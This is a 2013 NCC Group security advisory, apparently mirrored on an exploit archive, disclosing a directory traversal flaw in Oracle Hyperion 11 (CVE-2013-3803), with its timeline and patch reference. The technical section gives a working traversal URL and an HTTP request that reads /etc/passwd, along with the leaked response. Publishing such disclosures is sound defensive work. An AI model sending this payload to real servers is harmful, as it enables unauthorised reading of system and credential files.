Oracle Hyperion 11 Directory Traversal

Oracle Hyperion 11 Directory Traversal: Posted Jul 31, 2013; Authored by Richard Warren | Site nccgroup.com; Oracle Hyperion 11 suffers from a directory traversal vulnerability. Versions 11.1.1.3, 11.1.1.4.107 and earlier, 11.1.2.1.129 and earlier, and 11.1.2.2.305 and earlier are affected.; tags | exploit; SHA-256 | a63ebab32dfca1c676f5478d4507e5cb9958e376a21f14bd4a427db0035dea98; Download | Favorite | View

Oracle Hyperion 11 Directory Traversal

=======
Summary
=======
Name: Oracle Hyperion 11 - Directory Traversal
Release Date: 30 July 2013
Reference: NGS00434
Discoverer: Richard Warren <richard.warren@nccgroup.com>
Vendor: Oracle
Vendor Reference: S0318807
Systems Affected: Oracle Hyperion 11.1.1.3, 11.1.1.4.107 and earlier, 11.1.2.1.129 and earlier, and 11.1.2.2.305 and earlier
Risk: High
Status: Published

========
TimeLine
========
Discovered: 20 November 2012
Released: 20 November 2012
Approved: 20 November 2012
Reported: 20 November 2012
Fixed: 16 July 2013
Published: 30 July 2013

===========
Description
===========
Product: Oracle
Application: Hyperion
Version: 11.x

Vulnerability
-------------

The application was found to be vulnerable to a directory traversal attack.
The following URL resulted in directory transversal.
http://localhost:19000/raframework/ihtml/GetResource?DocUUID=00000122ad09cf47-0000-d521-0aeaf211&DocInstanceID=1&ResourceName=../../../../../../../../../../../../../../../../LFI_HERE

=================
Technical Details
=================
Exploitation
------------

The following request/response was observed:

GET
/raframework/ihtml/GetResource?DocUUID=00000122ad09cf47-0000-d521-0aeaf211&DocInstanceID=1&ResourceName=../../../../../../../../../../../../../../../../etc/passwd
HTTP/1.0

HTTP/1.1 200 OK
Date: Mon, 12 Nov 2012 15:28:10 GMT
Server: Oracle-Application-Server-11g
Cache-Control: no-cache
Pragma: no-cache
Expires: Mon, 1 Jan 1990 00:00:00 GMT
Last-Modified: Mon, 12 Nov 2012 15:28:10 GMT
X-ORACLE-DMS-ECID: 004n^rmuJTjAtH^5lV5EiZ0004FS0058zX
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close
Content-Type: text/plain
Content-Language: en

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
--SNIP--

===============
Fix Information
===============
Fixed in Oracle CPU July 2013:
http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html
Assigned CVE-2013-3803


NCC Group Research
http://www.nccgroup.com/research


For more information please visit <a href="http://www.mimecast.com">http://www.mimecast.com<br>
This email message has been delivered safely and archived online by Mimecast.
</a>

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Oracle Hyperion 11 Directory Traversal

Oracle Hyperion 11 Directory Traversal

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Oracle Hyperion 11 Directory Traversal

Share This

Oracle Hyperion 11 Directory Traversal

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems